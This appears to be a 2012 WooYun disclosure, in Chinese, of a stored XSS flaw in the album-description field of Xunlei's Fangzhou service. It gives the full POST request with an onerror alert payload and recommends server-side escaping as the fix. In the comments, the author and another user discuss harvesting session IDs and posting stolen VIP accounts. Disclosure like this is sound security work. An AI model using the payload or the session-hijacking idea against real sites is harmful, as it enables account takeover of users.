当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011783

漏洞标题:迅雷方舟储存型XSS一枚

相关厂商:迅雷

漏洞作者: 123hurray

提交时间:2012-09-05 15:54

修复时间:2012-10-20 15:54

公开时间:2012-10-20 15:54

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-09-05: 细节已通知厂商并且等待厂商处理中
2012-09-10: 厂商已经确认,细节仅向厂商公开
2012-09-20: 细节向核心白帽子及相关领域专家公开
2012-09-30: 细节向普通白帽子公开
2012-10-10: 细节向实习白帽子公开
2012-10-20: 细节向公众公开

简要描述:

迅雷方舟储存型XSS一枚

详细说明:

在迅雷方舟发布新专辑时只在前端用js做了特殊字符的过滤,而在后端则只对专辑名做过滤,忽略了对“专辑描述”的过滤,导致专辑描述中可能出现xss漏洞。所以绕过前端脚本验证即可向服务器传入xss。
以下是POST的数据,利用图片的onerror事件触发:
Request URL:http://svr.f.xunlei.com/folder/mkdir?xltime=8038554
Request Method:POST
Form Data:
requestType:8038554
proxyUrl:http://f.xunlei.com/postProxy.html
userId:53393744
path:/xss
desc:<img src='1' onerror='alert("xss")'>
category:13
status:1
topic:true
tags:

漏洞证明:

POST成功后即可见到如下截图:


该专辑可被任何用户浏览而导致严重问题。
迅雷方舟未过滤所有特殊字符,导致随意插入html标签。

修复方案:

在后端对传入数据做验证;转义特殊字符。

版权声明:转载请注明来源 123hurray@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2012-09-10 12:44

厂商回复:

感谢反馈,qiaoyue同学已经反馈过了,我们还在完善中,感谢关注迅雷安全!

最新状态:

暂无

漏洞评价:

评论

  1. 2012-09-11 23:36 | 123hurray ( 路人 | Rank:12 漏洞数:4 | Very excited to be a member in WooYun)

    @迅雷 ,跟他的不一样好不好,你们看仔细些。那个是迅雷快传,这是迅雷方舟。那个是文件名,这个是文件描述,完全两码事。用这个漏洞,随便上传个热门文件,然后就能获取一大批sessionid了。然后,你们懂的。Rank才1太少了吧。。。

  2. 2012-10-21 11:47 | Allmylife ( 实习白帽子 | Rank:69 漏洞数:18 | Pay all my life on security!)

    @123hurray 搞一些VIP账号贴出来,rank就上去啦,呵呵

  3. 2012-10-22 15:16 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    rank+1

  4. 2012-11-09 20:52 | 123hurray ( 路人 | Rank:12 漏洞数:4 | Very excited to be a member in WooYun)

    @Allmylife 有道理。。。